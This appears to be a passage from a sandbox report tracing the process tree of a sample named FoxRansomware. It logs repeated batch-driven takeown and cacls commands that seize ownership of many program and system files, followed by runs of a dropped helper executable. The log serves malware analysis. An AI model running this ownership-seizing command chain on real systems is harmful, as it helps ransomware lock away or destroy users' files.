      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "classes.jsa" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 2952)
        D22bUU4y.exe -accepteula "classes.jsa" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 1720)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 5136)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 5160)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 5148)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
      - Modifies file permissions

    C:\Windows\SysWOW64\cmd.exe  (PID 5196)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AdobeID.pdf" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 5200)
        D22bUU4y.exe -accepteula "AdobeID.pdf" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 2356)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 1992)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 2512)
      cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 5584)
      takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"

    C:\Windows\SysWOW64\cmd.exe  (PID 1224)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "classes.jsa" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 1472)
        D22bUU4y.exe -accepteula "classes.jsa" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 5580)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
  C:\Windows\SysWOW64\cmd.exe  (PID 4904)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
    - Loads dropped DLL

    C:\Windows\SysWOW64\cacls.exe  (PID 3212)
      cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C

    C:\Windows\SysWOW64\takeown.exe  (PID 3016)
      takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe  (PID 5100)
      C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MahjongMCE.png" -nobanner
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 2200)
        D22bUU4y.exe -accepteula "MahjongMCE.png" -nobanner
        - Executes dropped EXE

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe  (PID 1688)
      D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵
- Loads dropped DLL
PID:1136 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:2716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "cryptocme2.sig" -nobanner3⤵
- Loads dropped DLL
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "cryptocme2.sig" -nobanner4⤵
- Executes dropped EXE
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵
- Loads dropped DLL
PID:1608 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:3112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "pmd.cer" -nobanner3⤵
- Loads dropped DLL
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "pmd.cer" -nobanner4⤵
- Executes dropped EXE
PID:2276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵
- Loads dropped DLL
PID:1672 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:2712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "email_initiator.gif" -nobanner3⤵
- Loads dropped DLL
PID:2696 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "email_initiator.gif" -nobanner4⤵
- Executes dropped EXE
PID:2452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵
- Loads dropped DLL
PID:3196 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:3944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:3240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "pdf.gif" -nobanner3⤵
- Loads dropped DLL
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "pdf.gif" -nobanner4⤵
- Executes dropped EXE
PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵
- Loads dropped DLL
PID:3252 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:3428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_issue.gif" -nobanner3⤵
- Loads dropped DLL
PID:3424 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "server_issue.gif" -nobanner4⤵
- Executes dropped EXE
PID:3496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵
- Loads dropped DLL
PID:3504 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:3012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:3004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵
- Loads dropped DLL
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵
- Executes dropped EXE
PID:1692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵
- Loads dropped DLL
PID:1676 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:3120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:3140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd.otf" -nobanner3⤵
- Loads dropped DLL
PID:3148 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CourierStd.otf" -nobanner4⤵
- Executes dropped EXE
PID:2332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2720
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵
- Loads dropped DLL
PID:280 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:3176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zx______.pfm" -nobanner3⤵
- Loads dropped DLL
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "zx______.pfm" -nobanner4⤵
- Executes dropped EXE
PID:5676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵
- Loads dropped DLL
PID:4480 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:4424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵
- Modifies file permissions
PID:4028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵
- Loads dropped DLL
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵
- Executes dropped EXE
PID:3360
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵
- Loads dropped DLL
PID:4580 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:4692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:4732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can32.clx" -nobanner3⤵
- Loads dropped DLL
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "can32.clx" -nobanner4⤵
- Executes dropped EXE
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵
- Loads dropped DLL
PID:5740 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:3568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "symbol.txt" -nobanner3⤵
- Loads dropped DLL
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "symbol.txt" -nobanner4⤵
- Executes dropped EXE
PID:4504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵
- Loads dropped DLL
PID:3684 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:5652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:4556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SYMBOL.TXT" -nobanner3⤵
- Loads dropped DLL
PID:5240 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SYMBOL.TXT" -nobanner4⤵
- Executes dropped EXE
PID:5552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵
- Loads dropped DLL
PID:3736 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:4712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3172 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:3808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3220 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:4160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵
- Loads dropped DLL
PID:5708 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:4264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner3⤵
- Loads dropped DLL
PID:5720 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵
- Loads dropped DLL
PID:5824 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:4584 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵
- Loads dropped DLL
PID:4140 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:4184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner3⤵
- Loads dropped DLL
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "qmgr1.dat" -nobanner4⤵
- Executes dropped EXE
PID:4216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵
- Loads dropped DLL
PID:4228 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:4456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "device.png" -nobanner3⤵
- Loads dropped DLL
PID:6132 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "device.png" -nobanner4⤵
- Executes dropped EXE
PID:4276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵
- Loads dropped DLL
PID:4304 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:6140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2468
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵
- Loads dropped DLL
PID:824 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner3⤵
- Loads dropped DLL
PID:5880 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tasks.xml" -nobanner4⤵
- Executes dropped EXE
PID:4616
-
-
-
